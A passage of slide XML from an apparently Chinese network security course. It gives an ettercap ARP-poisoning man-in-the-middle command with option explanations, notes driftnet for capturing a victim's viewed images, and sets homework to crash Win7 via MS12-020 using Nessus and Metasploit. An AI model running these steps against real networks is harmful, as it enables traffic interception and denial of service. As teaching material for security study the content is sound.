                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Tq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> –M </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>arp:remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> /IP1// /IP2//</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本占位符 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="747527" y="4055820"/>
            <a:ext cx="7386538" cy="507804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2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>选择网络接口，默认为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>eth0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-M,--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>mitm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;METHOD:ARGS&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>执行中间人攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-T,--text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：使用文本模式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-q,--quiet: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>不显示包内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>-P&lt;plugin&gt;:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>加载的插件</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{35962598-E6FF-8B0A-F4EF-79C91DB3E144}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="546100" y="1889413"/>
            <a:ext cx="11099800" cy="148669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200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>当用户成功实施中间人攻击后，可以使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>driftnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>工具来捕获图片。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>driftnet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>是一款简单而实用的图片捕获工具，可以很方便的在网络数据包中抓取图片。通过与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>工具配合使用，可以捕获目标主机浏览的所有图片。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED2FB33A-76B6-FD43-85A9-44CD51070250}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6713765" y="3553643"/>
            <a:ext cx="7875814" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址是：指定要嗅探的局域网的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址是：网关地址</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40484209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06E9B7B-7F11-8A76-4183-A7114FA5B3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585" y="1039815"/>
            <a:ext cx="10943859" cy="5595001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28226179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226275F-2EFE-BDAF-7B13-738366E87D3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="980162" y="1980706"/>
            <a:ext cx="11211838" cy="1949508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>搜索对应活跃主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>win7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>蓝屏漏洞端口</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>新建名为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Advanced Scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>策略</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="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执行漏洞扫描</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>3.Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>漏洞利用（分别使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEECE69B-1B7A-B883-ED31-6A482413F3BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="490081" y="1046700"/>
            <a:ext cx="10972800" cy="9310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a:lstStyle>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>作业</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>：（原理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>操作步骤）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" latinLnBrk="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>蓝屏攻击 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>MS12_020</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7D0A43C-46CD-0970-A4D3-BBD37DA8CE94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="490081" y="4338257"/>
            <a:ext cx="10972800" cy="9310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a:lstStyle>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr latinLnBrk="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEAAF985-AF16-7BD2-6387-0566CB6F3EB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="500743" y="4105661"/>
            <a:ext cx="9138062" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
